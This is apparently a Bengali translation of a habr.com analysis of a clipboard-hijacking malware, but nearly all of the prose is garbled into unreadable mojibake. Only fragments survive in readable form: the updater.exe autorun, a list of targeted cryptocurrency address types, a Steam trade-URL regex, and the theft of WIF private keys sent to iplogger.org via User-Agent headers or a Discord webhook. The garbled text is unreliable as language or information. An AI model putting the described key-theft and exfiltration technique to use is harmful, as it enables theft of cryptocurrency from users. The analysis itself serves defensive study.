āĻāĻāĻ¨ā§āĻĄā§āĻ āĻ°ā§āĻāĻŋāĻ¸ā§āĻā§āĻ°āĻŋāĻ¤ā§ āĻāĻŦāĻ āĻĒāĻžāĻĨ āĻ¯ā§āĻ āĻāĻ°ā§ updater.exe
. āĻāĻāĻāĻžāĻŦā§, āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§ āĻ¯āĻ¤āĻŦāĻžāĻ° āĻ˛āĻ āĻāĻ¨ āĻāĻ°āĻŦā§ āĻŽā§āĻ¯āĻžāĻ˛āĻāĻ¯āĻŧā§āĻ¯āĻžāĻ°āĻāĻŋ āĻāĻžāĻ°ā§āĻ¯āĻāĻ° āĻāĻ°āĻž āĻšāĻŦā§āĨ¤
āĻŦāĻŋāĻĻā§āĻŦā§āĻˇāĻĒā§āĻ°ā§āĻŖ āĻāĻāĻ°āĻŖ
āĻā§āĻ˛āĻŋāĻĒāĻŦā§āĻ¯āĻžāĻā§āĻāĻžāĻ°ā§āĻ° āĻŽāĻ¤ā§, āĻŽā§āĻ¯āĻžāĻ˛āĻāĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻā§āĻ˛āĻŋāĻĒāĻŦā§āĻ°ā§āĻĄā§āĻ° āĻŦāĻŋāĻˇāĻ¯āĻŧāĻŦāĻ¸ā§āĻ¤ā§ āĻ¨āĻŋāĻ°ā§āĻā§āĻˇāĻŖ āĻāĻ°ā§ āĻāĻŦāĻ āĻā§āĻ°āĻŋāĻĒā§āĻā§āĻāĻžāĻ°ā§āĻ¨ā§āĻ¸āĻŋ āĻāĻ¯āĻŧāĻžāĻ˛ā§āĻ āĻ āĻŋāĻāĻžāĻ¨āĻžāĻā§āĻ˛āĻŋ āĻ¸āĻ¨ā§āĻ§āĻžāĻ¨ āĻāĻ°ā§ āĻāĻŦāĻ āĻ¯āĻāĻ¨ āĻĒāĻžāĻāĻ¯āĻŧāĻž āĻ¯āĻžāĻ¯āĻŧ, āĻ¤āĻāĻ¨ āĻāĻāĻŋ āĻ āĻĒāĻžāĻ°ā§āĻāĻ°ā§āĻ° āĻ āĻŋāĻāĻžāĻ¨āĻžāĻā§āĻ˛āĻŋāĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻāĻāĻāĻŋ āĻĻāĻŋāĻ¯āĻŧā§ āĻĒā§āĻ°āĻ¤āĻŋāĻ¸ā§āĻĨāĻžāĻĒāĻ¨ āĻāĻ°ā§ā§ˇ āĻā§āĻĄā§ āĻ¯āĻž āĻĒāĻžāĻāĻ¯āĻŧāĻž āĻ¯āĻžāĻ¯āĻŧ āĻ¤āĻžāĻ° āĻāĻĒāĻ° āĻāĻŋāĻ¤ā§āĻ¤āĻŋ āĻāĻ°ā§ āĻ¨ā§āĻā§ āĻ˛āĻā§āĻˇā§āĻ¯ āĻ āĻŋāĻāĻžāĻ¨āĻžāĻā§āĻ˛āĻŋāĻ° āĻāĻāĻāĻŋ āĻ¤āĻžāĻ˛āĻŋāĻāĻž āĻ°āĻ¯āĻŧā§āĻā§ā§ˇ
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
āĻĒā§āĻ°āĻ¤āĻŋāĻāĻŋ āĻ§āĻ°āĻ¨ā§āĻ° āĻ āĻŋāĻāĻžāĻ¨āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻāĻāĻāĻŋ āĻ¸āĻāĻļā§āĻ˛āĻŋāĻˇā§āĻ āĻ¨āĻŋāĻ¯āĻŧāĻŽāĻŋāĻ¤ āĻ āĻāĻŋāĻŦā§āĻ¯āĻā§āĻ¤āĻŋ āĻāĻā§āĨ¤ STEAM_URL āĻŽāĻžāĻ¨āĻāĻŋ āĻ¸ā§āĻāĻŋāĻŽ āĻ¸āĻŋāĻ¸ā§āĻā§āĻŽāĻā§ āĻāĻā§āĻ°āĻŽāĻŖ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻž āĻšāĻ¯āĻŧ, āĻ¯āĻž āĻ°ā§āĻā§āĻ˛āĻžāĻ° āĻāĻā§āĻ¸āĻĒā§āĻ°ā§āĻļāĻ¨ āĻĨā§āĻā§ āĻĻā§āĻāĻž āĻ¯āĻžāĻ¯āĻŧ āĻ¯āĻž āĻŦāĻžāĻĢāĻžāĻ°ā§ āĻ¸āĻāĻā§āĻāĻžāĻ¯āĻŧāĻŋāĻ¤ āĻāĻ°āĻ¤ā§ āĻŦā§āĻ¯āĻŦāĻšā§āĻ¤ āĻšāĻ¯āĻŧ:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
āĻāĻā§āĻ¸āĻĢāĻŋāĻ˛ā§āĻā§āĻ°ā§āĻļāĻ¨ āĻā§āĻ¯āĻžāĻ¨ā§āĻ˛
āĻŦāĻžāĻĢāĻžāĻ°ā§ āĻ āĻŋāĻāĻžāĻ¨āĻžāĻā§āĻ˛āĻŋ āĻĒā§āĻ°āĻ¤āĻŋāĻ¸ā§āĻĨāĻžāĻĒāĻ¨ āĻāĻ°āĻžāĻ° āĻĒāĻžāĻļāĻžāĻĒāĻžāĻļāĻŋ, āĻŽā§āĻ¯āĻžāĻ˛āĻāĻ¯āĻŧā§āĻ¯āĻžāĻ°āĻāĻŋ āĻŦāĻŋāĻāĻāĻ¯āĻŧā§āĻ¨, āĻŦāĻŋāĻāĻāĻ¯āĻŧā§āĻ¨ āĻā§āĻ° āĻāĻŦāĻ āĻāĻ˛ā§āĻāĻā§āĻ°āĻžāĻŽ āĻŦāĻŋāĻāĻāĻ¯āĻŧā§āĻ¨ āĻāĻ¯āĻŧāĻžāĻ˛ā§āĻā§āĻ° āĻŦā§āĻ¯āĻā§āĻ¤āĻŋāĻāĻ¤ WIF āĻā§āĻā§āĻ˛āĻŋāĻā§ āĻ˛āĻā§āĻˇā§āĻ¯ āĻāĻ°ā§āĨ¤ WIF āĻĒā§āĻ°āĻžāĻāĻā§āĻ āĻā§ āĻĒā§āĻ¤ā§ āĻĒā§āĻ°ā§āĻā§āĻ°āĻžāĻŽāĻāĻŋ plogger.org āĻā§ āĻāĻā§āĻ¸āĻĢāĻŋāĻ˛ā§āĻā§āĻ°ā§āĻļāĻ¨ āĻā§āĻ¯āĻžāĻ¨ā§āĻ˛ āĻšāĻŋāĻ¸ā§āĻŦā§ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĨ¤ āĻāĻāĻŋ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯, āĻ āĻĒāĻžāĻ°ā§āĻāĻ°āĻ°āĻž āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§-āĻāĻā§āĻ¨ā§āĻ HTTP āĻļāĻŋāĻ°ā§āĻ¨āĻžāĻŽā§ āĻŦā§āĻ¯āĻā§āĻ¤āĻŋāĻāĻ¤ āĻā§ āĻĄā§āĻāĻž āĻ¯ā§āĻ āĻāĻ°ā§, āĻ¯ā§āĻŽāĻ¨ āĻ¨ā§āĻā§ āĻĻā§āĻāĻžāĻ¨ā§ āĻšāĻ¯āĻŧā§āĻā§āĨ¤
āĻāĻŋāĻ¤ā§āĻ° 4. āĻāĻāĻāĻĒā§āĻ āĻĄā§āĻāĻž āĻ¸āĻš āĻāĻāĻĒāĻŋ āĻ˛āĻāĻžāĻ° āĻāĻ¨āĻ¸ā§āĻ˛āĨ¤
āĻ
āĻĒāĻžāĻ°ā§āĻāĻ°āĻ°āĻž āĻŽāĻžāĻ¨āĻŋāĻŦā§āĻ¯āĻžāĻ āĻŦā§āĻ° āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ iplogger.org āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĻ¨āĻŋāĨ¤ āĻā§āĻˇā§āĻ¤ā§āĻ°ā§āĻ° 255 āĻ
āĻā§āĻˇāĻ° āĻ¸ā§āĻŽāĻžāĻ° āĻāĻžāĻ°āĻŖā§ āĻ¤āĻžāĻ°āĻž āĻ¸āĻŽā§āĻāĻŦāĻ¤ āĻāĻāĻāĻŋ āĻāĻŋāĻ¨ā§āĻ¨ āĻĒāĻĻā§āĻ§āĻ¤āĻŋ āĻ
āĻŦāĻ˛āĻŽā§āĻŦāĻ¨ āĻāĻ°ā§āĻā§ User-Agent
āĻāĻāĻĒāĻŋ āĻ˛āĻāĻžāĻ° āĻāĻ¯āĻŧā§āĻŦ āĻāĻ¨ā§āĻāĻžāĻ°āĻĢā§āĻ¸ā§ āĻĒā§āĻ°āĻĻāĻ°ā§āĻļāĻŋāĻ¤ āĻšāĻ¯āĻŧāĨ¤ āĻāĻŽāĻ°āĻž āĻ¯ā§ āĻ¨āĻŽā§āĻ¨āĻžāĻā§āĻ˛āĻŋ āĻ
āĻ§ā§āĻ¯āĻ¯āĻŧāĻ¨ āĻāĻ°ā§āĻāĻŋ āĻ¤āĻžāĻ¤ā§, āĻ
āĻ¨ā§āĻ¯āĻžāĻ¨ā§āĻ¯ āĻāĻāĻāĻĒā§āĻ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ° āĻĒāĻ°āĻŋāĻŦā§āĻļ āĻĒāĻ°āĻŋāĻŦāĻ°ā§āĻ¤āĻ¨āĻļā§āĻ˛ā§ āĻ¸āĻāĻ°āĻā§āĻˇāĻŖ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛ DiscordWebHook
. āĻāĻļā§āĻāĻ°ā§āĻ¯āĻāĻ¨āĻāĻāĻžāĻŦā§, āĻāĻ āĻāĻ¨āĻāĻžāĻ¯āĻŧāĻ°āĻ¨āĻŽā§āĻ¨ā§āĻ āĻā§āĻ°āĻŋāĻ¯āĻŧā§āĻŦāĻ˛āĻāĻŋ āĻā§āĻĄā§āĻ° āĻā§āĻĨāĻžāĻ āĻŦāĻ°āĻžāĻĻā§āĻĻ āĻāĻ°āĻž āĻšāĻ¯āĻŧāĻ¨āĻŋāĨ¤ āĻāĻāĻŋ āĻĒāĻ°āĻžāĻŽāĻ°ā§āĻļ āĻĻā§āĻ¯āĻŧ āĻ¯ā§ āĻŽā§āĻ¯āĻžāĻ˛āĻāĻ¯āĻŧā§āĻ¯āĻžāĻ°āĻāĻŋ āĻāĻāĻ¨āĻ āĻŦāĻŋāĻāĻžāĻļā§āĻ° āĻ
āĻ§ā§āĻ¨ā§ āĻ°āĻ¯āĻŧā§āĻā§ āĻāĻŦāĻ āĻĒāĻ°āĻŋāĻŦāĻ°ā§āĻ¤āĻ¨āĻļā§āĻ˛āĻāĻŋ āĻ
āĻĒāĻžāĻ°ā§āĻāĻ°ā§āĻ° āĻĒāĻ°ā§āĻā§āĻˇāĻž āĻŽā§āĻļāĻŋāĻ¨ā§ āĻŦāĻ°āĻžāĻĻā§āĻĻ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻā§ā§ˇ
āĻĒā§āĻ°ā§āĻā§āĻ°āĻžāĻŽāĻāĻŋ āĻŦāĻŋāĻāĻžāĻļā§āĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻ°āĻ¯āĻŧā§āĻā§ āĻāĻŽāĻ¨ āĻāĻ°ā§āĻāĻāĻŋ āĻ˛āĻā§āĻˇāĻŖ āĻ°āĻ¯āĻŧā§āĻā§āĨ¤ āĻŦāĻžāĻāĻ¨āĻžāĻ°āĻŋ āĻĢāĻžāĻāĻ˛ā§ āĻĻā§āĻāĻŋ iplogger.org āĻāĻāĻāĻ°āĻāĻ˛ āĻ°āĻ¯āĻŧā§āĻā§ āĻāĻŦāĻ āĻĄā§āĻāĻž āĻāĻā§āĻ¸āĻĢāĻŋāĻ˛ā§āĻ āĻāĻ°āĻž āĻšāĻ˛ā§ āĻāĻāĻ¯āĻŧāĻā§āĻ āĻāĻŋāĻā§āĻāĻžāĻ¸āĻž āĻāĻ°āĻž āĻšāĻ¯āĻŧāĨ¤ āĻāĻ āĻāĻāĻāĻ°āĻāĻ˛āĻā§āĻ˛āĻŋāĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻāĻāĻāĻŋāĻ° āĻ āĻ¨ā§āĻ°ā§āĻ§ā§, āĻ°ā§āĻĢāĻžāĻ°āĻžāĻ° āĻā§āĻˇā§āĻ¤ā§āĻ°ā§āĻ° āĻŽāĻžāĻ¨āĻāĻŋ "DEV /" āĻĻā§āĻŦāĻžāĻ°āĻž āĻāĻā§ āĻĨāĻžāĻā§ā§ˇ āĻāĻŽāĻ°āĻž āĻāĻŽāĻ¨ āĻāĻāĻāĻŋ āĻ¸āĻāĻ¸ā§āĻāĻ°āĻŖāĻ āĻĒā§āĻ¯āĻŧā§āĻāĻŋ āĻ¯āĻž ConfuserEx āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻĒā§āĻ¯āĻžāĻā§āĻ āĻāĻ°āĻž āĻšāĻ¯āĻŧāĻ¨āĻŋ, āĻāĻ URL āĻāĻ° āĻĒā§āĻ°āĻžāĻĒāĻā§āĻ° āĻ¨āĻžāĻŽ DevFeedbackUrlāĨ¤ āĻĒāĻ°āĻŋāĻŦā§āĻļ āĻĒāĻ°āĻŋāĻŦāĻ°ā§āĻ¤āĻ¨āĻļā§āĻ˛ āĻ¨āĻžāĻŽā§āĻ° āĻāĻĒāĻ° āĻāĻŋāĻ¤ā§āĻ¤āĻŋ āĻāĻ°ā§, āĻāĻŽāĻ°āĻž āĻŦāĻŋāĻļā§āĻŦāĻžāĻ¸ āĻāĻ°āĻŋ āĻ¯ā§ āĻ āĻĒāĻžāĻ°ā§āĻāĻ°āĻ°āĻž āĻā§āĻ°āĻŋāĻĒā§āĻā§āĻāĻžāĻ°ā§āĻ¨ā§āĻ¸āĻŋ āĻāĻ¯āĻŧāĻžāĻ˛ā§āĻ āĻā§āĻ°āĻŋ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻŦā§āĻ§ āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻž Discord āĻāĻŦāĻ āĻāĻ° āĻāĻ¯āĻŧā§āĻŦ āĻāĻ¨ā§āĻāĻžāĻ°āĻ¸ā§āĻĒāĻļāĻ¨ āĻ¸āĻŋāĻ¸ā§āĻā§āĻŽ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻžāĻ° āĻĒāĻ°āĻŋāĻāĻ˛ā§āĻĒāĻ¨āĻž āĻāĻ°āĻā§āĨ¤
āĻāĻĒāĻ¸āĻāĻšāĻžāĻ°
āĻāĻ āĻĒā§āĻ°āĻāĻžāĻ°āĻžāĻāĻŋāĻ¯āĻžāĻ¨āĻāĻŋ āĻ¸āĻžāĻāĻŦāĻžāĻ° āĻāĻā§āĻ°āĻŽāĻŖā§ āĻŦā§āĻ§ āĻŦāĻŋāĻā§āĻāĻžāĻĒāĻ¨ āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻž āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°ā§āĻ° āĻāĻāĻāĻŋ āĻāĻĻāĻžāĻšāĻ°āĻŖāĨ¤ āĻāĻ āĻ¸ā§āĻāĻŋāĻŽāĻāĻŋ āĻ°āĻžāĻļāĻŋāĻ¯āĻŧāĻžāĻ¨ āĻ¸āĻāĻ¸ā§āĻĨāĻžāĻā§āĻ˛āĻŋāĻā§ āĻ˛āĻā§āĻˇā§āĻ¯ āĻāĻ°ā§, āĻ¤āĻŦā§ āĻ -āĻ°āĻžāĻļāĻŋāĻ¯āĻŧāĻžāĻ¨ āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻžāĻā§āĻ˛āĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻāĻ āĻ§āĻ°āĻ¨ā§āĻ° āĻāĻā§āĻ°āĻŽāĻŖ āĻĻā§āĻā§ āĻāĻŽāĻ°āĻž āĻ āĻŦāĻžāĻ āĻšāĻŦ āĻ¨āĻžāĨ¤ āĻāĻĒāĻ¸ āĻāĻĄāĻŧāĻžāĻ¨ā§āĻ° āĻāĻ¨ā§āĻ¯, āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§āĻĻā§āĻ° āĻ āĻŦāĻļā§āĻ¯āĻ āĻ¤āĻžāĻĻā§āĻ° āĻĄāĻžāĻāĻ¨āĻ˛ā§āĻĄ āĻāĻ°āĻž āĻ¸āĻĢā§āĻāĻāĻ¯āĻŧā§āĻ¯āĻžāĻ°āĻāĻŋāĻ° āĻāĻ¤ā§āĻ¸ā§āĻ° āĻā§āĻ¯āĻžāĻ¤āĻŋāĻ° āĻŦāĻŋāĻˇāĻ¯āĻŧā§ āĻ¨āĻŋāĻļā§āĻāĻŋāĻ¤ āĻšāĻ¤ā§ āĻšāĻŦā§ā§ˇ
āĻ¸āĻŽāĻā§āĻ¤āĻžāĻ° āĻ¸ā§āĻāĻ āĻāĻŦāĻ MITER ATT&CK āĻŦā§āĻļāĻŋāĻˇā§āĻā§āĻ¯ā§āĻ° āĻāĻāĻāĻŋ āĻ¸āĻŽā§āĻĒā§āĻ°ā§āĻŖ āĻ¤āĻžāĻ˛āĻŋāĻāĻž āĻāĻāĻžāĻ¨ā§ āĻāĻĒāĻ˛āĻŦā§āĻ§
āĻāĻ¤ā§āĻ¸: www.habr.com